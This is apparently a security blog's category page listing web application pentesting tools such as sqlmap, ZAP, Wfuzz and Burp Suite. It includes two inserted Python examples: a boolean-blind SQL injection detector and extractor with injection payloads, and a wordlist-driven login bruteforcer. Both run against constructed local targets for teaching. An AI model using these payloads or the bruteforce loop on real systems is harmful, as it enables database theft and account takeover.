Category: Web Application Security

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the …

Permanent link to this article: https://www.darknessgate.com/2015/05/13/sqlmap-2/
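The detection and data-fetching steps the sqlmap excerpt lists can be reduced to a boolean oracle: a condition that is true must reproduce the baseline page and one that is false must change it, and once that holds, any value the database can compute can be read out one character at a time. The block below is an added example, not sqlmap's own code: it builds a constructed in-memory SQLite application with a deliberately vulnerable lookup beside a parameterised one, runs the boolean-based blind test against both, and then extracts a row through the oracle. The names `vulnerable_lookup`, `safe_lookup`, `detect_boolean_blind` and `extract_blind` are illustrative.

```python
# Added example (not sqlmap code): boolean-based blind SQL injection detection and
# extraction against a constructed SQLite app. Everything here runs offline.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database: three users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


CONN = build_db()


def vulnerable_lookup(name: str) -> str:
    """Stand-in for a vulnerable endpoint: user input is concatenated into the query.
    The returned string models the page body the tester sees."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    try:
        rows = CONN.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"
    return "found" if rows else "not found"


def safe_lookup(name: str) -> str:
    """Hardened endpoint: the value is bound as a parameter, so any payload is
    just a literal string that matches no row."""
    rows = CONN.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()
    return "found" if rows else "not found"


def detect_boolean_blind(endpoint, base_value: str) -> bool:
    """Boolean-based blind check: a TRUE condition must keep the baseline page
    and a FALSE condition must change it. Both payloads close the open quote
    and re-balance it, so no comment terminator is needed."""
    baseline = endpoint(base_value)
    true_page = endpoint(f"{base_value}' AND '1'='1")
    false_page = endpoint(f"{base_value}' AND '1'='2")
    return true_page == baseline and false_page != baseline


def extract_blind(endpoint, base_value: str, subquery: str, max_len: int = 32) -> str:
    """Fetch the string produced by `subquery` through the boolean oracle, one
    character per position. Pointing `subquery` at sqlite_version() would be the
    fingerprinting step; here it is used to read a column value."""
    baseline = endpoint(base_value)
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"{base_value}' AND substr(({subquery}),{pos},1)='{ch}"
            if endpoint(payload) == baseline:
                out += ch
                break
        else:
            break  # no character matched at this position: end of string
    return out


if __name__ == "__main__":
    for name, ep in (("vulnerable", vulnerable_lookup), ("parameterised", safe_lookup)):
        injectable = detect_boolean_blind(ep, "alice")
        print(f"{name}: injectable={injectable}")
        if injectable:
            role = extract_blind(ep, "alice", "SELECT role FROM users WHERE name='alice'")
            print(f"  alice's role read blind: {role}")
```

The parameterised endpoint fails the detection step because both probe values are treated as literal names and return the same "not found" page; that is the property a fix must restore, and it is also why a scanner's true/false comparison, not the mere presence of a quote character, is what establishes injectability.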

IronWASP

IronWASP by Lavakumar is another great web application pentesting tool, and like ZAP it also provides an application proxy to intercept traffic and perform manual testing. It has certain features which are not provided by other similar tools, such as SSRF exploitation, a SAP scanner and scripting within the interface. Under the tools tab we can get …

Permanent link to this article: https://www.darknessgate.com/2015/05/06/ironwasp/

OWASP Zed Attack Proxy Project

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners …

Permanent link to this article: https://www.darknessgate.com/2015/05/06/owasp-zed-attack-proxy-project/

Grendel-Scan

Grendel-Scan is a tool for automated security scanning of web applications. Many features are also present for manual penetration testing. Download: http://sourceforge.net/projects/grendel/files/

Permanent link to this article: https://www.darknessgate.com/2015/03/01/grendel-scan/

Wfuzz

Wfuzz is a tool designed for bruteforcing web applications. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.), bruteforcing GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP, etc.), bruteforcing form parameters (user/password), fuzzing, etc. Some features: multiple injection points with multiple dictionaries; recursion (when doing …

Permanent link to this article: https://www.darknessgate.com/2015/02/26/wfuzz/
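The "multiple injection points with multiple dictionaries" feature in the Wfuzz excerpt is the mechanism that turns a form bruteforce into a product of wordlists: the request template carries one marker per injection point, every combination of dictionary entries is rendered into it, and each response is kept or hidden by its status code or size. The block below is an added example, not Wfuzz's own code. It borrows Wfuzz's marker spelling (`FUZZ` for the first point, `FUZ2Z` for the second) but the expansion, the `mock_login` target with its constructed valid credential, and the `fuzz_form` filter are this example's own assumptions.

```python
# Added example (not Wfuzz code): multi-injection-point expansion with one
# wordlist per point, driven against a constructed local login handler.
import itertools
import re
from typing import Callable, Iterator, List, Sequence, Tuple

# FUZZ -> wordlist 1, FUZ2Z -> wordlist 2, FUZ3Z -> wordlist 3, ...
MARKER = re.compile(r"FUZ(\d*)Z")


def expand(template: str, wordlists: Sequence[Sequence[str]]) -> Iterator[Tuple[tuple, str]]:
    """Yield (payload_combination, rendered_request) for the cartesian product of
    the wordlists. A marker with no number is point 1; FUZnZ is point n."""
    def render(combo: tuple) -> str:
        return MARKER.sub(lambda m: combo[int(m.group(1) or 1) - 1], template)

    for combo in itertools.product(*wordlists):
        yield combo, render(combo)


# Constructed secret that the bruteforce is expected to recover.
VALID_CREDS = {("admin", "letmein")}


def mock_login(request: str) -> Tuple[int, int]:
    """Stand-in for a login form taking 'user=X&pass=Y'. Returns (status, body
    length), the two response attributes a fuzzer records for every probe:
    a redirect on success, a fixed-size failure page otherwise."""
    fields = dict(pair.split("=", 1) for pair in request.split("&"))
    if (fields.get("user"), fields.get("pass")) in VALID_CREDS:
        return 302, 0
    return 200, 1200 + len(fields.get("user", ""))


def fuzz_form(
    template: str,
    wordlists: Sequence[Sequence[str]],
    target: Callable[[str], Tuple[int, int]],
    hide_codes: Sequence[int] = (200,),
) -> List[Tuple[tuple, int, int]]:
    """Send every expansion to `target` and keep only responses whose status is
    not in `hide_codes` (the role of a 'hide code' filter in a fuzzer)."""
    hits = []
    for combo, request in expand(template, wordlists):
        status, length = target(request)
        if status not in hide_codes:
            hits.append((combo, status, length))
    return hits


if __name__ == "__main__":
    users = ["admin", "root"]
    passwords = ["password", "letmein", "123456"]
    for combo, status, length in fuzz_form("user=FUZZ&pass=FUZ2Z", [users, passwords], mock_login):
        print(f"hit: user={combo[0]} pass={combo[1]} status={status} len={length}")
```

Two wordlists of two and three entries produce six requests; the only one not hidden by the status filter is the valid pair. Against a real target the size filter matters as much as the status filter, because many applications answer both success and failure with 200 and differ only in body length.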

Wapiti – the web-application vulnerability scanner

Wapiti allows you to audit the security of your web applications. It performs “black-box” scans, i.e. it does not study the source code of the application but scans the web pages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, …

Permanent link to this article: https://www.darknessgate.com/2015/02/12/web-application-vulnerability-scanner/

ratproxy

ratproxy is a semi-automated, largely passive web application security audit tool, optimized for accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments. It detects and prioritizes broad classes of security problems, such as dynamic cross-site trust model considerations, script …

Permanent link to this article: https://www.darknessgate.com/2012/07/25/ratproxy/

Samurai Web Testing Framework

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use …

Permanent link to this article: https://www.darknessgate.com/2012/07/25/samurai-web-testing-framework/

Paros – for web application security assessment

Paros is for people who need to evaluate the security of their web applications. It is free of charge and completely written in Java. Through Paros’s proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified. Download Paros

Permanent link to this article: https://www.darknessgate.com/2012/07/25/paros-for-web-application-security-assessment/

W3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. Supported OS: Windows, Linux. Download W3af

Permanent link to this article: https://www.darknessgate.com/2012/07/25/w3af/

Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface through to finding and exploiting security vulnerabilities. Free version features: an intercepting proxy, which lets you inspect and modify traffic …

Permanent link to this article: https://www.darknessgate.com/2012/07/24/burp-suite/